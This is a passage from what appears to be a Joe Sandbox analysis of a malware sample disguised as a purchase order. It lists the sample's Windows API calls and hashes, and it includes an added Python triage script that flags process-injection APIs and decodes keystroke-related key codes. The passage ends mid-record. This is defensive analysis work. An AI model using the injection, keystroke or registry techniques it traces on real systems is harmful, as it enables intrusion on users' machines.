                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 621800784-4108050209
                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                            • String ID: \VH
                                                            • API String ID: 3884216118-234962358
                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                            • IsMenu.USER32(?), ref: 0044854D
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                            • DrawMenuBar.USER32 ref: 004485AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID: 0
                                                            • API String ID: 3076010158-4108050209
                                                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1589278365-1403004172
                                                            • Opcode ID: acd92c5f85bdaaaa2466511ae3885981b3e9fa80dd98d811b4eaed8c03ab0688
                                                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                            • Opcode Fuzzy Hash: acd92c5f85bdaaaa2466511ae3885981b3e9fa80dd98d811b4eaed8c03ab0688
                                                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
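The per-function records above (an "APIs" list, then "Memory Dump Source" and "Similarity" fields) are tedious to triage by eye. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that plain-text layout into structured records, flags calls from a watch list (the WATCHLIST contents are my own triage choice) and resolves the MapVirtualKeyW virtual-key codes to their VK_* names. SAMPLE is constructed from two records shown on this page (the TerminateThread function starting at ref 0044B655 and the MapVirtualKeyW function starting at ref 00410AE8); the record layout is assumed to match the export seen here.

```python
"""Parse Joe Sandbox per-function records into structured data for bulk triage.

Added example, not from the Joe Sandbox report. SAMPLE is constructed from two
records on this page; the plain-text field layout is an assumption.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Memory Dump Source
• Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
"""

# "• Name.MODULE(args), ref: 0041xxxx", optionally prefixed by "Part of subcall function <addr>:"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>API String ID|Instruction Fuzzy Hash):\s*(?P<value>\S+)$")

# Triage watch list (my own choice): thread/process-tampering APIs worth a second look.
WATCHLIST = {"TerminateThread", "SetThreadContext", "NtQueueApcThread",
             "WriteProcessMemory", "CreateRemoteThread", "VirtualAllocEx"}

# Win32 virtual-key codes seen in the MapVirtualKeyW record on this page.
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set when listed under "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_string_id: str = ""
    fuzzy_hash: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs' header; non-API lines are ignored."""
    records: List[FunctionRecord] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            continue
        if not records:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            records[-1].calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            if m["key"] == "API String ID":
                records[-1].api_string_id = m["value"]
            else:
                records[-1].fuzzy_hash = m["value"]
    return records


def flag_calls(record: FunctionRecord, watchlist=WATCHLIST) -> List[str]:
    """Watch-listed API names the function (or its reported subcalls) invokes, in order."""
    return [c.name for c in record.calls if c.name in watchlist]


def describe_virtual_keys(record: FunctionRecord) -> List[str]:
    """Resolve the uCode argument of each MapVirtualKeyW call to its VK_* name."""
    names = []
    for c in record.calls:
        if c.name != "MapVirtualKeyW" or not c.args or c.args[0] == "?":
            continue
        code = int(c.args[0], 16)
        names.append(VIRTUAL_KEYS.get(code, f"0x{code:02X}"))
    return names


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_string_id, [c.name for c in rec.calls], flag_calls(rec), describe_virtual_keys(rec))
```

The VK_* resolution shows the second function mapping the Win, Shift, Ctrl and Alt modifier keys, which is what a keystroke-sending routine does; the watch list hit on the first function is only a pointer for manual review, since TerminateThread inside a critical section is as consistent with ordinary thread cleanup as with anything hostile.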
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: SysAnimate32
                                                            • API String ID: 0-1011021900
                                                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            • GetFocus.USER32 ref: 0046157B
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                            • __swprintf.LIBCMT ref: 00461608
                                                            Strings
                                                            Similarity
                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                            • String ID: %s%d
                                                            • API String ID: 2645982514-1110647743
                                                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                            • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID:
                                                            • API String ID: 2449869053-0
                                                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004563A6
                                                            • ScreenToClient.USER32(?,?), ref: 004563C3
                                                            • GetAsyncKeyState.USER32(?), ref: 00456400
                                                            • GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                            • String ID:
                                                            • API String ID: 3539004672-0
                                                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID:
                                                            • API String ID: 327565842-0
                                                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                            Similarity
                                                            • API ID: Enum$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 2095303065-0
                                                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                            Similarity
                                                            • API ID: RectWindow
                                                            • String ID:
                                                            • API String ID: 861336768-0
                                                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00449598
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                            • _wcslen.LIBCMT ref: 0044960D
                                                            • _wcslen.LIBCMT ref: 0044961A
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 1856069659-0
                                                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004478E2
                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                            • GetCursorPos.USER32(00000000), ref: 0044796A
                                                            • TrackPopupMenuEx.USER32(00A06370,00000000,00000000,?,?,00000000), ref: 00447991
                                                            Similarity
                                                            • API ID: CursorMenuPopupTrack$Proc
                                                            • String ID:
                                                            • API String ID: 1300944170-0
                                                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004479CC
                                                            • GetCursorPos.USER32(?), ref: 004479D7
                                                            • ScreenToClient.USER32(?,?), ref: 004479F3
                                                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                            Similarity
                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 1822080540-0
                                                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
